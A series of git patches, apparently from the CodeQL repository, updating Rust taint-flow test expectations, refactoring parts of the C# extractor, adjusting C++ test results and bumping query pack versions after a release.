| source(...) | source(...) | | main.rs:42:10:42:24 | get_var_pos(...) | main.rs:40:13:40:21 | source(...) | main.rs:42:10:42:24 | get_var_pos(...) | $@ | main.rs:40:13:40:21 | source(...) | source(...) | | main.rs:57:33:57:33 | i | main.rs:53:13:53:21 | source(...) | main.rs:57:33:57:33 | i | $@ | main.rs:53:13:53:21 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected b/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected index e69de29bb2d..04b8539a2ee 100644 --- a/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected +++ b/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected @@ -0,0 +1,8 @@ +| main.rs:4:5:4:8 | 1000 | main.rs:4:5:4:12 | ... + ... | | +| main.rs:4:12:4:12 | i | main.rs:4:5:4:12 | ... + ... | | +| main.rs:13:10:13:10 | a | main.rs:13:10:13:14 | ... + ... | | +| main.rs:13:14:13:14 | 1 | main.rs:13:10:13:14 | ... + ... | | +| main.rs:18:11:18:11 | a | main.rs:18:10:18:11 | - ... | | +| main.rs:23:13:23:13 | a | main.rs:23:13:23:19 | a as u8 | | +| main.rs:24:10:24:10 | b | main.rs:24:10:24:17 | b as i64 | | +| main.rs:38:23:38:23 | s | main.rs:38:23:38:29 | s[...] | | diff --git a/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected b/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected index 4e4a41dfc62..37ea5f51c78 100644 --- a/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected +++ b/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected @@ -1,6 +1,18 @@ models edges +| main.rs:12:13:12:22 | source(...) | main.rs:13:10:13:14 | ... + ... | provenance | | +| main.rs:17:13:17:22 | source(...) | main.rs:18:10:18:11 | - ... | provenance | | +| main.rs:22:13:22:22 | source(...) | main.rs:24:10:24:17 | b as i64 | provenance | | nodes +| main.rs:12:13:12:22 | source(...) | semmle.label | source(...) | +| main.rs:13:10:13:14 | ... + ... | semmle.label | ... + ... | +| main.rs:17:13:17:22 | source(...) | semmle.label | source(...) | +| main.rs:18:10:18:11 | - ... | semmle.label | - ... | +| main.rs:22:13:22:22 | source(...) | semmle.label | source(...) | +| main.rs:24:10:24:17 | b as i64 | semmle.label | b as i64 | subpaths testFailures #select +| main.rs:13:10:13:14 | ... + ... | main.rs:12:13:12:22 | source(...) | main.rs:13:10:13:14 | ... + ... | $@ | main.rs:12:13:12:22 | source(...) | source(...) | +| main.rs:18:10:18:11 | - ... | main.rs:17:13:17:22 | source(...) | main.rs:18:10:18:11 | - ... | $@ | main.rs:17:13:17:22 | source(...) | source(...) | +| main.rs:24:10:24:17 | b as i64 | main.rs:22:13:22:22 | source(...) | main.rs:24:10:24:17 | b as i64 | $@ | main.rs:22:13:22:22 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/taint/main.rs b/rust/ql/test/library-tests/dataflow/taint/main.rs index 9029b883dc7..0ce5ba06391 100644 --- a/rust/ql/test/library-tests/dataflow/taint/main.rs +++ b/rust/ql/test/library-tests/dataflow/taint/main.rs @@ -10,18 +10,18 @@ fn sink(s: i64) { fn addition() { let a = source(42); - sink(a + 1); // $ MISSING: hasTaintFlow=42 + sink(a + 1); // $ hasTaintFlow=42 } fn negation() { let a = source(17); - sink(-a); // $ MISSING: hasTaintFlow=17 + sink(-a); // $ hasTaintFlow=17 } fn cast() { let a = source(77); let b = a as u8; - sink(b as i64); // $ MISSING: hasTaintFlow=77 + sink(b as i64); // $ hasTaintFlow=77 } mod string { From c6d2bf2046a94d3155699e7e305c9e3330882b5e Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Dec 2024 14:31:39 +0100 Subject: [PATCH 0801/1267] C#: Add extra flag to tracing debugging launch. --- csharp/.vscode/launch.json | 1 + 1 file changed, 1 insertion(+) diff --git a/csharp/.vscode/launch.json b/csharp/.vscode/launch.json index f5b4aa79cc1..75a43a6f9aa 100644 --- a/csharp/.vscode/launch.json +++ b/csharp/.vscode/launch.json @@ -75,6 +75,7 @@ "env": {}, "stopAtEntry": true, "justMyCode": false, + "requireExactSource": false, "suppressJITOptimizations": true }, ] From 57c3b571ab9fa13e7197ae762d89c5dd4fe082e6 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Dec 2024 14:32:16 +0100 Subject: [PATCH 0802/1267] C#: Narrow types to SingleVariableDesignation syntax (to avoid future compiler warning). --- .../Entities/Expressions/Patterns/Pattern.cs | 23 +++++++++---------- .../Expressions/Patterns/RecursivePattern.cs | 2 +- 2 files changed, 12 insertions(+), 13 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Patterns/Pattern.cs b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Patterns/Pattern.cs index d59f3013c98..70c755b51d5 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Patterns/Pattern.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Patterns/Pattern.cs @@ -28,20 +28,20 @@ namespace Semmle.Extraction.CSharp.Entities.Expressions case DeclarationPatternSyntax declPattern: // Creates a single local variable declaration. { - if (declPattern.Designation is VariableDesignationSyntax designation) + switch (declPattern.Designation) { - if (cx.GetModel(syntax).GetDeclaredSymbol(designation) is ILocalSymbol symbol) - { - var type = symbol.GetAnnotatedType(); - return VariableDeclaration.Create(cx, symbol, type, declPattern.Type, cx.CreateLocation(syntax.GetLocation()), false, parent, child); - } - if (designation is DiscardDesignationSyntax) - { + case SingleVariableDesignationSyntax singleDesignation: + if (cx.GetModel(syntax).GetDeclaredSymbol(singleDesignation) is ILocalSymbol symbol) + { + var type = symbol.GetAnnotatedType(); + return VariableDeclaration.Create(cx, symbol, type, declPattern.Type, cx.CreateLocation(syntax.GetLocation()), false, parent, child); + } + throw new InternalError(singleDesignation, "Unable to get the declared symbol of the declaration pattern designation."); + case DiscardDesignationSyntax _: return Expressions.TypeAccess.Create(cx, declPattern.Type, parent, child); - } - throw new InternalError(designation, "Designation pattern not handled"); + default: + throw new InternalError($"declaration pattern designation of type {declPattern.Designation.GetType()} is unhandled"); } - throw new InternalError(declPattern, "Declaration pattern not handled"); } case RecursivePatternSyntax recPattern: @@ -59,7 +59,6 @@ namespace Semmle.Extraction.CSharp.Entities.Expressions if (cx.GetModel(syntax).GetDeclaredSymbol(varDesignation) is ILocalSymbol symbol) { var type = symbol.GetAnnotatedType(); - return VariableDeclaration.Create(cx, symbol, type, null, cx.CreateLocation(syntax.GetLocation()), true, parent, child); } diff --git a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Patterns/RecursivePattern.cs b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Patterns/RecursivePattern.cs index 514867770b6..febbdacd14c 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Patterns/RecursivePattern.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp/Entities/Expressions/Patterns/RecursivePattern.cs @@ -22,7 +22,7 @@ namespace Semmle.Extraction.CSharp.Entities.Expressions Expressions.TypeAccess.Create(cx, t, this, 1); // Extract the local variable declaration - if (syntax.Designation is VariableDesignationSyntax designation && cx.GetModel(syntax).GetDeclaredSymbol(designation) is ILocalSymbol symbol) + if (syntax.Designation is SingleVariableDesignationSyntax designation && cx.GetModel(syntax).GetDeclaredSymbol(designation) is ILocalSymbol symbol) { var type = symbol.GetAnnotatedType(); From dde0281d25a7653359a593915620ef188940387f Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 25 Nov 2024 13:19:59 +0100 Subject: [PATCH 0803/1267] C#: Use dedicated lock type where applicable. --- .../NugetPackageRestorer.cs | 5 ++--- .../Semmle.Extraction.CSharp/Extractor/ExtractionContext.cs | 3 ++- csharp/extractor/Semmle.Util/Logging/PidStreamWriter.cs | 4 ++-- csharp/extractor/Testrunner/Testrunner.cs | 2 +- 4 files changed, 7 insertions(+), 7 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs index 3895db3e4d4..f30760981f3 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs @@ -4,7 +4,6 @@ using System.Collections.Generic; using System.IO; using System.Linq; using System.Net.Http; -using System.Security.Cryptography; using System.Text; using System.Text.RegularExpressions; using System.Threading; @@ -264,7 +263,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching var isWindows = fileContent.UseWindowsForms || fileContent.UseWpf; - var sync = new object(); + var sync = new Lock(); var projectGroups = projects.GroupBy(Path.GetDirectoryName); Parallel.ForEach(projectGroups, new ParallelOptions { MaxDegreeOfParallelism = DependencyManager.Threads }, projectGroup => { @@ -346,7 +345,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching compilationInfoContainer.CompilationInfos.Add(("Fallback nuget restore", notYetDownloadedPackages.Count.ToString())); var successCount = 0; - var sync = new object(); + var sync = new Lock(); Parallel.ForEach(notYetDownloadedPackages, new ParallelOptions { MaxDegreeOfParallelism = DependencyManager.Threads }, package => { diff --git a/csharp/extractor/Semmle.Extraction.CSharp/Extractor/ExtractionContext.cs b/csharp/extractor/Semmle.Extraction.CSharp/Extractor/ExtractionContext.cs index 619eb995347..262475ca5a1 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp/Extractor/ExtractionContext.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp/Extractor/ExtractionContext.cs @@ -1,4 +1,5 @@ using System.Collections.Generic; +using System.Threading; using Semmle.Util.Logging; using CompilationInfo = (string key, string value); @@ -38,7 +39,7 @@ namespace Semmle.Extraction.CSharp // to handle pathological cases. private const int maxErrors = 1000; - private readonly object mutex = new object(); + private readonly Lock mutex = new(); public void Message(Message msg) { diff --git a/csharp/extractor/Semmle.Util/Logging/PidStreamWriter.cs b/csharp/extractor/Semmle.Util/Logging/PidStreamWriter.cs index 7d9599298d6..cf4d8be52e5 100644 --- a/csharp/extractor/Semmle.Util/Logging/PidStreamWriter.cs +++ b/csharp/extractor/Semmle.Util/Logging/PidStreamWriter.cs @@ -1,5 +1,5 @@ using System.IO; -using System.Diagnostics; +using System.Threading; namespace Semmle.Util.Logging { @@ -33,6 +33,6 @@ namespace Semmle.Util.Logging WriteLine(format is null ? format : string.Format(format, args)); } - private readonly object mutex = new object(); + private readonly Lock mutex = new(); } } diff --git a/csharp/extractor/Testrunner/Testrunner.cs b/csharp/extractor/Testrunner/Testrunner.cs index 6280a8c1be2..d772ca903f7 100644 --- a/csharp/extractor/Testrunner/Testrunner.cs +++ b/csharp/extractor/Testrunner/Testrunner.cs @@ -14,7 +14,7 @@ using System; /// public class Testrunner { - private static readonly object ConsoleLock = new(); + private static readonly Lock ConsoleLock = new(); private static readonly ManualResetEvent Finished = new(false); From 38e3913fa90618fe6d7f9cebf39ab2209066772a Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 27 Nov 2024 10:03:17 +0100 Subject: [PATCH 0804/1267] C#: Remove redundant using statements. --- .../extractor/Semmle.Extraction.CSharp.Standalone/Options.cs | 4 +--- .../extractor/Semmle.Extraction.CSharp.Standalone/Program.cs | 5 ----- 2 files changed, 1 insertion(+), 8 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.Standalone/Options.cs b/csharp/extractor/Semmle.Extraction.CSharp.Standalone/Options.cs index 39c363a7753..64d7535ee2a 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.Standalone/Options.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.Standalone/Options.cs @@ -1,8 +1,6 @@ +using System; using System.IO; using Semmle.Util; -using Semmle.Util.Logging; -using Semmle.Extraction.CSharp.DependencyFetching; -using System; namespace Semmle.Extraction.CSharp.Standalone { diff --git a/csharp/extractor/Semmle.Extraction.CSharp.Standalone/Program.cs b/csharp/extractor/Semmle.Extraction.CSharp.Standalone/Program.cs index fc13b774f4f..475847be576 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.Standalone/Program.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.Standalone/Program.cs @@ -1,8 +1,3 @@ -using System; -using System.Collections.Generic; -using Semmle.Util.Logging; -using Semmle.Extraction.CSharp.DependencyFetching; - namespace Semmle.Extraction.CSharp.Standalone { public class Program From 4f00e229e0296e97560923442508a9ae30ad904f Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 4 Dec 2024 13:49:07 +0000 Subject: [PATCH 0805/1267] C++: Accept more test changes. --- .../dataflow/external-models/flow.expected | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected index a8a3e5a209a..81a9c605f00 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected @@ -11,14 +11,14 @@ edges | asio_streams.cpp:100:44:100:62 | call to buffer | asio_streams.cpp:103:29:103:39 | *send_buffer | provenance | Sink:MaD:6 | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | provenance | | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:100:44:100:62 | call to buffer | provenance | MaD:10 | -| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:810 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:808 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:809 | +| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:800 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:798 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:799 | | test.cpp:7:10:7:18 | call to ymlSource | test.cpp:13:18:13:18 | x | provenance | | | test.cpp:13:10:13:16 | call to ymlStep | test.cpp:13:10:13:16 | call to ymlStep | provenance | | -| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:809 | +| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:799 | | test.cpp:13:18:13:18 | x | test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | provenance | | -| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:810 | +| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:800 | nodes | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | semmle.label | [summary param] *0 in buffer | | asio_streams.cpp:56:18:56:23 | [summary] to write: ReturnValue in buffer | semmle.label | [summary] to write: ReturnValue in buffer | From 147d6991333e702528e8c386e8ee7aac5c0897e9 Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Wed, 4 Dec 2024 15:45:17 +0000 Subject: [PATCH 0806/1267] C++: Add another test case --- .../WrongNumberOfFormatArguments.expected | 1 + .../Format/WrongNumberOfFormatArguments/syntax_errors.c | 7 +++++++ 2 files changed, 8 insertions(+) diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected index d99190ef1eb..0c0ae6000cd 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected @@ -5,6 +5,7 @@ | macros.cpp:14:2:14:37 | call to printf | Format for printf (in a macro expansion) expects 4 arguments but given 3 | | macros.cpp:21:2:21:36 | call to printf | Format for printf (in a macro expansion) expects 4 arguments but given 3 | | macros.cpp:32:2:32:25 | call to printf | Format for printf (in a macro expansion) expects 1 arguments but given 0 | +| syntax_errors.c:15:5:15:10 | call to printf | Format for printf expects 2 arguments but given 0 | | test.c:9:2:9:7 | call to printf | Format for printf expects 1 arguments but given 0 | | test.c:12:2:12:7 | call to printf | Format for printf expects 2 arguments but given 1 | | test.c:15:2:15:7 | call to printf | Format for printf expects 3 arguments but given 2 | diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c index c9f7ab4dc4b..d10d1025b8f 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c @@ -3,9 +3,16 @@ extern int printf(const char *fmt, ...); void test_syntax_error() { + // GOOD printf("Error code %d: " UNDEFINED_MACRO, 0, ""); + // GOOD printf("%d%d", (UNDEFINED_MACRO)1, (UNDEFINED_MACRO)2); + + // GOOD [FALSE POSITIVE] + printf("%d%d" + UNDEFINED_MACRO, + 1, 2); } From cf71a1525b2549b92b331ba3a04a55705317038a Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" Date: Wed, 4 Dec 2024 18:36:17 +0000 Subject: [PATCH 0807/1267] Post-release preparation for codeql-cli-2.20.0 --- cpp/ql/lib/qlpack.yml | 2 +- cpp/ql/src/qlpack.yml | 2 +- csharp/ql/campaigns/Solorigate/lib/qlpack.yml | 2 +- csharp/ql/campaigns/Solorigate/src/qlpack.yml | 2 +- csharp/ql/lib/qlpack.yml | 2 +- csharp/ql/src/qlpack.yml | 2 +- go/ql/consistency-queries/qlpack.yml | 2 +- go/ql/lib/qlpack.yml | 2 +- go/ql/src/qlpack.yml | 2 +- java/ql/lib/qlpack.yml | 2 +- java/ql/src/qlpack.yml | 2 +- javascript/ql/lib/qlpack.yml | 2 +- javascript/ql/src/qlpack.yml | 2 +- misc/suite-helpers/qlpack.yml | 2 +- python/ql/lib/qlpack.yml | 2 +- python/ql/src/qlpack.yml | 2 +- ruby/ql/lib/qlpack.yml | 2 +- ruby/ql/src/qlpack.yml | 2 +- shared/controlflow/qlpack.yml | 2 +- shared/dataflow/qlpack.yml | 2 +- shared/mad/qlpack.yml | 2 +- shared/rangeanalysis/qlpack.yml | 2 +- shared/regex/qlpack.yml | 2 +- shared/ssa/qlpack.yml | 2 +- shared/threat-models/qlpack.yml | 2 +- shared/tutorial/qlpack.yml | 2 +- shared/typeflow/qlpack.yml | 2 +- shared/typetracking/qlpack.yml | 2 +- shared/typos/qlpack.yml | 2 +- shared/util/qlpack.yml | 2 +- shared/xml/qlpack.yml | 2 +- shared/yaml/qlpack.yml | 2 +- swift/ql/lib/qlpack.yml | 2 +- swift/ql/src/qlpack.yml | 2 +- 34 files changed, 34 insertions(+), 34 deletions(-) diff --git a/cpp/ql/lib/qlpack.yml b/cpp/ql/lib/qlpack.yml index 723a2c3544e..4bb4b04e02f 100644 --- a/cpp/ql/lib/qlpack.yml +++ b/cpp/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/cpp-all -version: 3.0.0 +version: 3.0.1-dev groups: cpp dbscheme: semmlecode.cpp.dbscheme extractor: cpp diff --git a/cpp/ql/src/qlpack.yml b/cpp/ql/src/qlpack.yml index 824ee1459aa..940c3e2a4cb 100644 --- a/cpp/ql/src/qlpack.yml +++ b/cpp/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/cpp-queries -version: 1.3.0 +version: 1.3.1-dev groups: - cpp - queries diff --git a/csharp/ql/campaigns/Solorigate/lib/qlpack.yml b/csharp/ql/campaigns/Solorigate/lib/qlpack.yml index daac6be2fbb..781915bf1a1 100644 --- a/csharp/ql/campaigns/Solorigate/lib/qlpack.yml +++ b/csharp/ql/campaigns/Solorigate/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/csharp-solorigate-all -version: 1.7.30 +version: 1.7.31-dev groups: - csharp - solorigate diff --git a/csharp/ql/campaigns/Solorigate/src/qlpack.yml b/csharp/ql/campaigns/Solorigate/src/qlpack.yml index 1b3b911c6f1..979d8e6c661 100644 --- a/csharp/ql/campaigns/Solorigate/src/qlpack.yml +++ b/csharp/ql/campaigns/Solorigate/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/csharp-solorigate-queries -version: 1.7.30 +version: 1.7.31-dev groups: - csharp - solorigate diff --git a/csharp/ql/lib/qlpack.yml b/csharp/ql/lib/qlpack.yml index d985d58b112..81a55470a4d 100644 --- a/csharp/ql/lib/qlpack.yml +++ b/csharp/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/csharp-all -version: 4.0.0 +version: 4.0.1-dev groups: csharp dbscheme: semmlecode.csharp.dbscheme extractor: csharp diff --git a/csharp/ql/src/qlpack.yml b/csharp/ql/src/qlpack.yml index f838d279d87..e4d9400d96d 100644 --- a/csharp/ql/src/qlpack.yml +++ b/csharp/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/csharp-queries -version: 1.0.13 +version: 1.0.14-dev groups: - csharp - queries diff --git a/go/ql/consistency-queries/qlpack.yml b/go/ql/consistency-queries/qlpack.yml index 72aeab276d7..1812705438c 100644 --- a/go/ql/consistency-queries/qlpack.yml +++ b/go/ql/consistency-queries/qlpack.yml @@ -1,5 +1,5 @@ name: codeql-go-consistency-queries -version: 1.0.13 +version: 1.0.14-dev groups: - go - queries diff --git a/go/ql/lib/qlpack.yml b/go/ql/lib/qlpack.yml index df0d0e9d5fc..4e72aa3857b 100644 --- a/go/ql/lib/qlpack.yml +++ b/go/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/go-all -version: 3.0.0 +version: 3.0.1-dev groups: go dbscheme: go.dbscheme extractor: go diff --git a/go/ql/src/qlpack.yml b/go/ql/src/qlpack.yml index ecd9cbb13f0..36775d0d862 100644 --- a/go/ql/src/qlpack.yml +++ b/go/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/go-queries -version: 1.1.4 +version: 1.1.5-dev groups: - go - queries diff --git a/java/ql/lib/qlpack.yml b/java/ql/lib/qlpack.yml index 54f56a24606..f892ca1c450 100644 --- a/java/ql/lib/qlpack.yml +++ b/java/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/java-all -version: 5.0.0 +version: 5.0.1-dev groups: java dbscheme: config/semmlecode.dbscheme extractor: java diff --git a/java/ql/src/qlpack.yml b/java/ql/src/qlpack.yml index eb757401a84..8ee211fb536 100644 --- a/java/ql/src/qlpack.yml +++ b/java/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/java-queries -version: 1.1.10 +version: 1.1.11-dev groups: - java - queries diff --git a/javascript/ql/lib/qlpack.yml b/javascript/ql/lib/qlpack.yml index 4245aa6e5d3..4d568ff4813 100644 --- a/javascript/ql/lib/qlpack.yml +++ b/javascript/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/javascript-all -version: 2.2.0 +version: 2.2.1-dev groups: javascript dbscheme: semmlecode.javascript.dbscheme extractor: javascript diff --git a/javascript/ql/src/qlpack.yml b/javascript/ql/src/qlpack.yml index ba7c502b29f..78f0585027b 100644 --- a/javascript/ql/src/qlpack.yml +++ b/javascript/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/javascript-queries -version: 1.2.5 +version: 1.2.6-dev groups: - javascript - queries diff --git a/misc/suite-helpers/qlpack.yml b/misc/suite-helpers/qlpack.yml index 834362022be..eeb8f762b13 100644 --- a/misc/suite-helpers/qlpack.yml +++ b/misc/suite-helpers/qlpack.yml @@ -1,4 +1,4 @@ name: codeql/suite-helpers -version: 1.0.13 +version: 1.0.14-dev groups: shared warnOnImplicitThis: true diff --git a/python/ql/lib/qlpack.yml b/python/ql/lib/qlpack.yml index 978dfd96a83..147933b96fe 100644 --- a/python/ql/lib/qlpack.yml +++ b/python/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/python-all -version: 3.0.0 +version: 3.0.1-dev groups: python dbscheme: semmlecode.python.dbscheme extractor: python diff --git a/python/ql/src/qlpack.yml b/python/ql/src/qlpack.yml index bff5afdf817..d83b6433ac6 100644 --- a/python/ql/src/qlpack.yml +++ b/python/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/python-queries -version: 1.3.4 +version: 1.3.5-dev groups: - python - queries diff --git a/ruby/ql/lib/qlpack.yml b/ruby/ql/lib/qlpack.yml index 41b72629a67..ddf106c95bf 100644 --- a/ruby/ql/lib/qlpack.yml +++ b/ruby/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/ruby-all -version: 3.0.0 +version: 3.0.1-dev groups: ruby extractor: ruby dbscheme: ruby.dbscheme diff --git a/ruby/ql/src/qlpack.yml b/ruby/ql/src/qlpack.yml index 7f337d89d6a..43bfe75f566 100644 --- a/ruby/ql/src/qlpack.yml +++ b/ruby/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/ruby-queries -version: 1.1.8 +version: 1.1.9-dev groups: - ruby - queries diff --git a/shared/controlflow/qlpack.yml b/shared/controlflow/qlpack.yml index 5401179ac96..268f142bd1b 100644 --- a/shared/controlflow/qlpack.yml +++ b/shared/controlflow/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/controlflow -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/dataflow/qlpack.yml b/shared/dataflow/qlpack.yml index 55eb216cc54..6a8e8c3a4ae 100644 --- a/shared/dataflow/qlpack.yml +++ b/shared/dataflow/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/dataflow -version: 1.1.7 +version: 1.1.8-dev groups: shared library: true dependencies: diff --git a/shared/mad/qlpack.yml b/shared/mad/qlpack.yml index 5c37e609029..125bcad622d 100644 --- a/shared/mad/qlpack.yml +++ b/shared/mad/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/mad -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/rangeanalysis/qlpack.yml b/shared/rangeanalysis/qlpack.yml index bd33c35fe53..62c8c1e46b6 100644 --- a/shared/rangeanalysis/qlpack.yml +++ b/shared/rangeanalysis/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/rangeanalysis -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/regex/qlpack.yml b/shared/regex/qlpack.yml index 07d9f87eb8c..e2cda264dc8 100644 --- a/shared/regex/qlpack.yml +++ b/shared/regex/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/regex -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/ssa/qlpack.yml b/shared/ssa/qlpack.yml index 9a2027d0706..b146ce5bc91 100644 --- a/shared/ssa/qlpack.yml +++ b/shared/ssa/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/ssa -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/threat-models/qlpack.yml b/shared/threat-models/qlpack.yml index d29bd36dd83..6ec41bbcc04 100644 --- a/shared/threat-models/qlpack.yml +++ b/shared/threat-models/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/threat-models -version: 1.0.13 +version: 1.0.14-dev library: true groups: shared dataExtensions: diff --git a/shared/tutorial/qlpack.yml b/shared/tutorial/qlpack.yml index e618abb068b..6677c74eed4 100644 --- a/shared/tutorial/qlpack.yml +++ b/shared/tutorial/qlpack.yml @@ -1,7 +1,7 @@ name: codeql/tutorial description: Library for the CodeQL detective tutorials, helping new users learn to write CodeQL queries. -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true warnOnImplicitThis: true diff --git a/shared/typeflow/qlpack.yml b/shared/typeflow/qlpack.yml index e9d46c074e8..cd9e70bba8c 100644 --- a/shared/typeflow/qlpack.yml +++ b/shared/typeflow/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/typeflow -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/typetracking/qlpack.yml b/shared/typetracking/qlpack.yml index 9e4717670a7..fbe63f0da01 100644 --- a/shared/typetracking/qlpack.yml +++ b/shared/typetracking/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/typetracking -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/typos/qlpack.yml b/shared/typos/qlpack.yml index b3ed91c0926..250f729ab5f 100644 --- a/shared/typos/qlpack.yml +++ b/shared/typos/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/typos -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true warnOnImplicitThis: true diff --git a/shared/util/qlpack.yml b/shared/util/qlpack.yml index 4b66bd8ad92..b327c25a3d9 100644 --- a/shared/util/qlpack.yml +++ b/shared/util/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/util -version: 2.0.0 +version: 2.0.1-dev groups: shared library: true dependencies: null diff --git a/shared/xml/qlpack.yml b/shared/xml/qlpack.yml index 8d8b1b8ee54..76c408c2920 100644 --- 